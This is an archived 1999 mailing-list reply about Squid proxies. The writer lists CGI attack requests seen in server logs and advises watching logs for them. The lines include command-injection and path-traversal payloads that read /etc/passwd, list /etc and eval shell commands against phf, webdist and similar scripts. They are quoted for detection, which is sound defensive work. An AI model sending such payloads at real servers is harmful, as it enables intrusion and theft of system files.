On Sat, 23 Jan 1999, James Young wrote:
> At 04:45 PM 1/23/99 +1000, mlowe@dataline.net.au wrote:
> >Are there any known expolits for squid? If so where is the list/site
> located?
I thought I'd mailed this list, but can't find my post. Maybe I didn't.
I have seen the following CGI exploits, many times:
/cgi-bin/phf?Qname=me%0als%20-lFa
/cgi-bin/faxsurvey?ls%20-lFa
/cgi-bin/handler/useless_shit;ls%20-lFa%20/etc|?data=Download
/cgi-bin/webdist.cgi?distloc=;ls%20-lFa%20/etc/
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/view-source?../../../../../../../../etc/passwd
/cgi-bin/htmlscript?../../../../../../../../etc/passwd
/cgi-bin/campas?%0als%20-lFa%20/etc
/cgi-bin/info2www?`(../../../../../../../../ls%20-lFa%20/etc|)`
/cgi-bin/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo
/cgi-bin/pfdisplay.cgi?'%0Als%20-lFa%20/etc
/cgi-bin/pfdispaly.cgi?'%0Als%20-lFa%20/etc
/_vti_pvt/service.pwd
If the origin server traps these but not x-forwarded-for, it looks like
your Squid machine is the abuser.
PHF was distributed with early Apache and NCSA httpd as a demo CGI script.
Webdist I think is an Irix software update tool. Not sure about the
others; they must be fairly common. _vti_pvt I presume is from NT.
One might consider searching for these when doing log rotation, and
preserving the trail for a bit longer than 36 hours or whatever people
use...
regards
Deniable unless digitally signed
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376
http://andrew.triumf.ca/andrew
Received on Fri Feb 05 1999 - 17:49:52 MST
This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 16:44:28 MST